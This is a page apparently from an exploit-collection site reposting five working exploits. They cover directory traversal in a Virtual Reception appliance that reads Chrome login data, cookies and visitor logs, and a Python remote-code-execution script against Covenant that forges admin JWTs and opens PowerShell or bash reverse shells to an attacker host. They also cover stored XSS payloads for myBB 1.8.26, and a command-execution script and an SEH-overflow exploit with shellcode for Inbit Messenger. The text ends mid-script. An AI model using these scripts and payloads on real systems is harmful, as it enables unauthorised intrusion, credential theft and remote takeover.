Latest exploits :: CodePwn

<pre><code># Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal # Exploit Author: Spinae # Vendor Homepage: https://www.virtualreception.nl/ # Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY # Tested on: all We discovered the web server of the Virtual Reception appliance is prone to an unauthenticated directory traversal vulnerability. This allows an attacker to traverse outside the server root directory by specifying files at the end of a URL request. This is a NUC5i5RY http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts http://[ip address]/C:/windows/WindowsUpdate.log ... A user called 'receptie' exists on the Windows system: http://[ip address]/c:/users/receptie/ntuser.dat http://[ip address]/c:/users/receptie/ntuser.ini http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log ... http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies ... The appliance also keeps a log of the visitors that register at the entrance: http://[ip address]/visitors.csv hash icon for shodan searches: https://www.shodan.io/search?query=http.favicon.hash%3A656388049 No reply from the vendor (phone, email, website form submissions), first reported in 2021. -- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you. </code></pre>

<pre><code># Exploit Title: Covenant v0.5 - Remote Code Execution (RCE) # Exploit Author: xThaz # Author website: https://xthaz.fr/ # Date: 2022-09-11 # Vendor Homepage: https://cobbr.io/Covenant.html # Software Link: https://github.com/cobbr/Covenant # Version: v0.1.3 - v0.5 # Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker # Vulnerability ## Discoverer: coastal ## Date: 2020-07-13 ## Discoverer website: https://blog.null.farm ## References: ## - https://blog.null.farm/hunting-the-hunters ## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb # !/usr/bin/env python3 # encoding: utf-8 import jwt # pip3 install PyJWT import json import warnings import base64 import re import random import argparse from requests.packages.urllib3.exceptions import InsecureRequestWarning from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome from Crypto.Util.Padding import pad from Crypto.Cipher import AES from requests import request # pip3 install requests from subprocess import run from pwn import remote, context # pip3 install pwntools from os import remove, urandom from shutil import which from urllib.parse import urlparse from pathlib import Path from time import time def check_requirements(): if which("mcs") is None: print("Please install the mono framework in order to compile the payload.") print("https://www.mono-project.com/download/stable/") exit(-1) def random_hex(length): alphabet = "0123456789abcdef" return ''.join(random.choice(alphabet) for _ in range(length)) def request_api(method, token, route, body=""): warnings.simplefilter('ignore', InsecureRequestWarning) return request( method, f"{args.target}/api/{route}", json=body, headers={ "Authorization": f"Bearer {token}", "Content-Type": "application/json" }, verify=False ) def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"): secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC' payload_data = { "sub": username, "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid, "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [ "User", "Administrator" ], "exp": int(time()) + 360, "iss": "Covenant", "aud": "Covenant" } token = jwt.encode(payload_data, secret_key, algorithm='HS256') return token def get_id_admin(token, json_roles): id_admin = "" for role in json_roles: if role["name"] == "Administrator": id_admin = role["id"] print(f"\t[*] Found the admin group id : {id_admin}") break else: print("\t[!] Did not found admin group id, quitting !") exit(-1) id_admin_user = "" json_users_roles = request_api("get", token, f"users/roles").json() for user_role in json_users_roles: if user_role["roleId"] == id_admin: id_admin_user = user_role["userId"] print(f"\t[*] Found the admin user id : {id_admin_user}") break else: print("\t[!] Did not found admin id, quitting !") exit(-1) json_users = request_api("get", token, f"users").json() for user in json_users: if user["id"] == id_admin_user: username_admin = user["userName"] print(f"\t[*] Found the admin username : {username_admin}") return username_admin, id_admin_user else: print("\t[!] Did not found admin username, quitting !") exit(-1) def compile_payload(): if args.os == "windows": payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""' else: payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""' dll = """using System; using System.Reflection; namespace ExampleDLL{ public class Class1{ public Class1(){ } public void Main(string[] args){ System.Diagnostics.Process.Start(""" + payload + """); } } } """ temp_dll_path = f"/tmp/{random_hex(8)}" Path(f"{temp_dll_path}.cs").write_bytes(dll.encode()) print(f"\t[*] Writing payload in {temp_dll_path}.cs") compilo_path = which("mcs") compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"]) if compilation.returncode: print("\t[!] Error when compiling DLL, quitting !") exit(-1) print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll") dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode() remove(temp_dll_path + ".cs") remove(temp_dll_path + ".dll") print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll") return dll_encoded def generate_wrapper(dll_encoded): wrapper = """public static class MessageTransform { public static string Transform(byte[] bytes) { try { string assemblyBase64 = \"""" + dll_encoded + """\"; var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); var assembly = System.Reflection.Assembly.Load(assemblyBytes); foreach (var type in assembly.GetTypes()) { object instance = System.Activator.CreateInstance(type); object[] args = new object[] { new string[] { \"\" } }; try { type.GetMethod(\"Main\").Invoke(instance, args); } catch {} } } catch {} return System.Convert.ToBase64String(bytes); } public static byte[] Invert(string str) { return System.Convert.FromBase64String(str); } }""" return wrapper def upload_profile(token, wrapper): body = { 'httpUrls': [ '/en-us/index.html', '/en-us/docs.html', '/en-us/test.html' ], 'httpRequestHeaders': [ {'name': 'User-Agent', 'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 ' 'Safari/537.36'}, {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'} ], 'httpResponseHeaders': [ {'name': 'Server', 'value': 'Microsoft-IIS/7.5'} ], 'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73', 'httpGetResponse': '{DATA}', 'httpPostResponse': '{DATA}', 'id': 0, 'name': random_hex(8), 'description': '', 'type': 'HTTP', 'messageTransform': wrapper } response = request_api("post", token, "profiles/http", body) if not response.ok: print("\t[!] Failed to create the listener profile, quitting !") exit(-1) else: profile_id = response.json().get('id') print(f"\t[*] Profile created with id {profile_id}") print("\t[*] Successfully created the listener profile") return profile_id def generate_valid_listener_port(impersonate_token, tries=0): if tries >= 10: print("\t[!] Tried 10 times to generate a listener port but failed, quitting !") exit(-1) port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT listeners = request_api("get", impersonate_token, "listeners").json() port_used = [] for listener in listeners: port_used.append(listener["bindPort"]) if port in port_used: print(f"\t[!] Port {port} is already taken by another listener, retrying !") generate_valid_listener_port(impersonate_token, tries + 1) else: print(f"\t[*] Port {port} seems free") return port def get_id_listener_type(impersonate_token, listener_name): response = request_api("get", impersonate_token, "listeners/types") if not response.ok: print("\t[!] Failed to get the listener type, quitting !") exit(-1) else: for listener_type in response.json(): if listener_type["name"] == listener_name: print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}') return listener_type["id"] def generate_listener(impersonate_token, profile_id): listener_port = generate_valid_listener_port(impersonate_token) listener_name = random_hex(8) data = { 'useSSL': False, 'urls': [ f"http://0.0.0.0:{listener_port}" ], 'id': 0, 'name': listener_name, 'bindAddress': "0.0.0.0", 'bindPort': listener_port, 'connectAddresses': [ "0.0.0.0" ], 'connectPort': listener_port, 'profileId': profile_id, 'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"), 'status': 'Active' } response = request_api("post", impersonate_token, "listeners/http", data) if not response.ok: print("\t[!] Failed to create the listener, quitting !") exit(-1) else: print("\t[*] Successfully created the listener") listener_id = response.json().get("id") return listener_id, listener_port def create_grunt(impersonate_token, data): stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": print("\t[!] Failed to create the grunt payload, quitting !") exit(-1) print("\t[*] Successfully created the grunt payload") return stager_code def get_grunt_config(impersonate_token, listener_id): data = { 'id': 0, 'listenerId': listener_id, 'implantTemplateId': 1, 'name': 'Binary', 'description': 'Uses a generated .NET Framework binary to launch a Grunt.', 'type': 'binary', 'dotNetVersion': 'Net35', 'runtimeIdentifier': 'win_x64', 'validateCert': True, 'useCertPinning': True, 'smbPipeName': 'string', 'delay': 0, 'jitterPercent': 0, 'connectAttempts': 0, 'launcherString': 'GruntHTTP.exe', 'outputKind': 'consoleApplication', 'compressStager': False } stager_code = create_grunt(impersonate_token, data) aes_key = re.search(r'FromBase64String$@\"(.[A-Za-z0-9+\/=]{40,50}?)\"$;', stager_code) guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code) if not aes_key or not guid_prefix: print("\t[!] Failed to retrieve the grunt configuration, quitting !") exit(-1) aes_key = aes_key.group(1) guid_prefix = guid_prefix.group(1) print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}") return aes_key, guid_prefix def aes256_cbc_encrypt(key, message): iv_bytes = urandom(16) key_decoded = base64.b64decode(key) encoded_message = pad(message.encode(), 16) cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes) encrypted = cipher.encrypt(encoded_message) hmac = HMAC.new(key_decoded, digestmod=SHA256) signature = hmac.update(encrypted).digest() return encrypted, iv_bytes, signature def trigger_exploit(listener_port, aes_key, guid): message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>" ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message) data = { "GUID": guid, "Type": 0, "Meta": '', "IV": base64.b64encode(iv).decode(), "EncryptedMessage": base64.b64encode(ciphered).decode(), "HMAC": base64.b64encode(signature).decode() } json_data = json.dumps(data).encode("utf-8") payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73" if send_exploit(listener_port, "Cookie", guid, payload): print("\t[*] Exploit succeeded, check listener") else : print("\t[!] Exploit failed, retrying") if send_exploit(listener_port, "Cookies", guid, payload): print("\t[*] Exploit succeeded, check listener") else: print("\t[!] Exploit failed, quitting") def send_exploit(listener_port, header_cookie, guid, payload): context.log_level = 'error' request = f"""POST /en-us/test.html HTTP/1.1\r Host: {IP_TARGET}:{listener_port}\r User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r {header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r Content-Type: application/x-www-form-urlencoded\r Content-Length: {len(payload)}\r \r {payload} """.encode() sock = remote(IP_TARGET, listener_port) sock.sendline(request) response = sock.recv().decode() sock.close() if "HTTP/1.1 200 OK" in response: return True else: return False if __name__ == "__main__": check_requirements() parser = argparse.ArgumentParser() parser.add_argument("target", help="URL where the Covenant is hosted, example : https://127.0.0.1:7443") parser.add_argument("os", help="Operating System of the target", choices=["windows", "linux"]) parser.add_argument("lhost", help="IP of the machine that will receive the reverse shell") parser.add_argument("lport", help="Port of the machine that will receive the reverse shell") args = parser.parse_args() IP_TARGET = urlparse(args.target).hostname print("[*] Getting the admin info") sacrificial_token = craft_jwt("xThaz") roles = request_api("get", sacrificial_token, "roles").json() admin_username, admin_id = get_id_admin(sacrificial_token, roles) impersonate_token = craft_jwt(admin_username, admin_id) print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}") print("[*] Generating payload") dll_encoded = compile_payload() wrapper = generate_wrapper(dll_encoded) print("[*] Uploading malicious listener profile") profile_id = upload_profile(impersonate_token, wrapper) print("[*] Generating listener") listener_id, listener_port = generate_listener(impersonate_token, profile_id) print("[*] Triggering the exploit") aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id) trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}") </code></pre>

<pre><code># Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) # Exploit Author: Andrey Stoykov # Software Link: https://mybb.com/versions/1.8.26/ # Version: 1.8.26 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as administrator user 2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> = "Global Templates"=20 3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale= rt(1)> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp= late HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr= or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing // HTTP redirect response to specific template HTTP/1.1 302 Found Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title= =3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1 [...] // HTTP GET request to newly created template GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 X-Powered-By: PHP/5.6.40 [...] <tr class=3D"first"> <td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio= n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3= E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td> [...] Stored XSS #2: To reproduce do the following: 1. Login as administrator user 2. Browse to "Forums and Posts" -> "Forum Management" 3. Select "Add New Forum" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP= /1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a= lert(1)</script>&description=3D"><script>alert(2)</script[...] // HTTP response showing successfully added a new forum HTTP/1.1 200 OK Date: Sun, 20 Nov 2022 11:00:28 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] // HTTP GET request to fetch forums GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] Sub Forums: <a href=3D"index.php?module=3Dforum-management&fid= =3D3">"><script>alert(1)</script></a> Stored XSS #3: To reproduce do the following: 1. Login as administrator user 2. Browse to "Forums and Posts" -> "Forum Announcements" 3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale= rt(1)> // HTTP POST request showing XSS payload POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H= TTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr= or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202= 2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea= r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert= (2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1 // HTTP response showing successfully added an anouncement HTTP/1.1 302 Found Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] // HTTP GET request to fetch forum URL GET /mybb_1826/ HTTP/1.1 Host: 192.168.139.132 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100= 101 Firefox/106.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P= erl/v5.16.3 [...] <a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>= </a> --sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d-- </code></pre>

<pre><code># Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, string, argparse, logging BANNER = """\033[0m\033[1;35m ╔══════════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║ ╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" # NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number TARGETS = { 4601 : 0x005f3360, 4801 : 0x005f7364, 4901 : 0x005f7364, } # NOTE: min and max values for length of command CMD_MIN_LEN = 10 CMD_MAX_LEN = 0xfc64 # NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow BAD_BYTES = b"\x3e" # > def getWinExecAddress(targetIp:str, targetPort:int) -> bytes: # NOTE: send packet with client build number of 4601 for v4.6.0 pkt = b"<50><0><IM><ID>7</ID><a>1</a>4601<c>1</c></IM>\x00" logging.info(f"trying to get version information from {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) _d = s.recv(1024) # find build tag in response if b'<c>' not in _d: logging.error(f"invalid version packet received: {_d}") sys.exit(-1) s.close() try: build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')]) except: logging.error(f"failed to parse build number from packet: {_d}") sys.exit(-1) # get the IAT offset if build not in TARGETS.keys(): logging.error(f"unexpected build number: {build}") sys.exit(-1) # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]' winexec = struct.pack("<I", TARGETS[build] - 0x38) logging.success(f"target build number is {build}") logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}") # sanity check for bad bytes in WinExec address for c in winexec: if c in BAD_BYTES: logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}") sys.exit(-1) return winexec def exploit(targetIp:str, targetPort:int, command:bytes) -> None: # NOTE: command must be NULL terminated command += b"\x00" # check user command length if len(command) < CMD_MIN_LEN: logging.error(f"command length must be at least {CMD_MIN_LEN} characters") sys.exit(-1) if len(command) >= CMD_MAX_LEN: logging.error(f"command length must be less than {CMD_MAX_LEN} characters") sys.exit(-1) # get WinExec address winexec = getWinExecAddress(targetIp, targetPort) # get a string representation of the length of the command data after the <> tag parsed by atol() pktLen = str(len(command)) pkt = b"<" # start of XML tag/stack overflow pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character pkt += b"\x00" # NULL terminator to force atol to ignore what comes next # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol() pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite pkt += winexec # indirect function pointer we control pkt += b">" # end of XML tag/stack overflow pkt += command # the command set to the call to WinExec() logging.info(f"sending payload to {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-c', '--command', help='command to run', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port, args.command.encode()) </code></pre>

<pre><code># Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, argparse, logging """ /opt/metasploit-framework/bin/msfvenom \ -p windows/messagebox \ ICON=WARNING \ TEXT="get wrecked" \ TITLE="LOLZ" \ EXITFUNC=thread \ -f py \ -v SHELLCODE \ -e x86/shikata_ga_nai \ -b '\x3E' """ SHELLCODE = b"" SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4" SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14" SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1" SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd" SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07" SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29" SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde" SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e" SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc" SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43" SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0" SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee" SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20" SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50" SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19" SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77" SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f" SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd" SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f" SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86" SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93" SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40" SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44" SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e" SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf" SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3" BANNER = """\033[0m\033[1;35m ╔═════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║ ╚═════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" BAD_BYTES = b"\x3e" # > PAYLOAD_LENGTH = 2000 nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET # NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10" NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48" NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01" NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B" NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00" NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89" NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00" def exploit(targetIp:str, targetPort:int) -> None: pkt = b"<" pkt += (b"A" * 40) pkt += nSEH pkt += SEH pkt += NULL_ACT_CTX_STUB pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder pkt += SHELLCODE # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt))) # NOTE: check for bad bytes for c in pkt: if c in BAD_BYTES: logging.error(f"found bad byte 0x{c:02x} in payload") sys.exit(-1) logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger 